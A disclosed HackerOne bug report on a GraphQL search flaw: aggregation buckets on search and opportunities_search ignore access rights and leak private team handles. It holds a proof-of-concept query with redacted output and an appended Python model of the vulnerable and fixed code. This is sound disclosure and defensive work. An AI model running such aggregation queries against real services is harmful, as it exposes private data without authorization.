HackerOne: Private information exposed through GraphQL search endpoints aggregates

2023-01-18 13:13:54
reigertje
hackerone.com (H1:1838329)

Summary:

Private information can be exposed using the aggs argument on the search and opportunities_search endpoints on the GraphQL root node.

Description:

When using the aggs argument and return field on the search and opportunities_search endpoints, the data returned in aggs can contain private information, because the aggregation buckets are not filtered by what the caller is allowed to see. It can for example be used to expose handles of private programs, and any other field that can be aggregated on.

Steps To Reproduce

This specific example exposes private team handles, but other data can be exposed in the same way using this or other indexes on the search endpoint.

  1. Open any GraphQL client, or modify an existing GraphQL request.
  2. Run a query with an aggregation on a field that could contain private information. The query below can be tweaked to get more specific results.
# Write your query or mutation here
query {
  me {
    id
  }
  opportunities_search(query:{}, aggs:{results:{terms: {field:"handle"}}}) {
    aggs
  }
}
  3. The output shows aggregations by handle that are not filtered on whether the team is private or not.
{
  "data": {
    "me": null,
    "opportunities_search": {
      "aggs": {
        "results": {
          "doc_count_error_upper_bound": 0,
          "sum_other_doc_count": 37,
          "buckets": [
            {
              "key": "private",
              "doc_count": 1
            },
            {
              "key": "private",
              "doc_count": 1
            },
            {
              "key": "private",
              "doc_count": 1
            },
            {
              "key": "private",
              "doc_count": 1
            },
            {
              "key": "private",
              "doc_count": 1
            },
            {
              "key": "private",
              "doc_count": 1
            },
            {
              "key": "private",
              "doc_count": 1
            },
            {
              "key": "private",
              "doc_count": 1
            },
            {
              "key": "private",
              "doc_count": 1
            },
            {
              "key": "private",
              "doc_count": 1
            }
          ]
        }
      }
    }
  }
}

Impact

Impact depends on what information is stored in which index and which fields can be aggregated on. In the current situation it at least allows exposing asset information, handles and other information of teams you don't have access to.
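The root cause described above, aggregations computed over the whole index while the hit list is authorization-filtered, as an added example that is not part of the report. It models a toy in-memory index with a constructed set of team documents and an Elasticsearch-style terms aggregation; the fix is to run the aggregation over the same authorization-filtered document set that produces the hits.

```python
"""Added example (not HackerOne's code): aggs must be scoped like the hits."""
from collections import Counter
from typing import Optional

# Constructed sample index: team documents with a visibility flag (names made up).
INDEX = [
    {"handle": "acme", "visibility": "public", "members": []},
    {"handle": "bigbank-internal", "visibility": "private", "members": ["alice"]},
    {"handle": "stealth-startup", "visibility": "private", "members": ["bob"]},
    {"handle": "opensource-proj", "visibility": "public", "members": []},
]


def visible_to(doc: dict, viewer: Optional[str]) -> bool:
    """Visibility rule the hit list already applies: public docs for everyone,
    private docs only for their members (viewer None = anonymous, i.e. `me: null`)."""
    return doc["visibility"] == "public" or (viewer is not None and viewer in doc["members"])


def terms_agg(docs: list, field: str, size: int = 10) -> dict:
    """Elasticsearch-style terms aggregation over a document list."""
    counts = Counter(d[field] for d in docs if field in d)
    top = counts.most_common(size)
    buckets = [{"key": key, "doc_count": n} for key, n in top]
    other = sum(counts.values()) - sum(n for _, n in top)
    return {"doc_count_error_upper_bound": 0, "sum_other_doc_count": other, "buckets": buckets}


def search_vulnerable(viewer: Optional[str], field: str) -> dict:
    """Vulnerable shape: hits are authorization-filtered, aggs run over the raw index."""
    hits = [d for d in INDEX if visible_to(d, viewer)]
    return {"hits": hits, "aggs": {"results": terms_agg(INDEX, field)}}


def search_fixed(viewer: Optional[str], field: str) -> dict:
    """Fixed shape: the same visibility filter scopes both hits and aggs."""
    hits = [d for d in INDEX if visible_to(d, viewer)]
    return {"hits": hits, "aggs": {"results": terms_agg(hits, field)}}


def leaked_keys(response: dict, field: str) -> set:
    """Regression check: aggregation keys that do not appear in the viewer's own hits."""
    visible = {h[field] for h in response["hits"]}
    return {b["key"] for b in response["aggs"]["results"]["buckets"]} - visible
```

The `leaked_keys` check is the assertion to keep in a test suite: for every viewer and aggregatable field, the fixed endpoint must return an empty set.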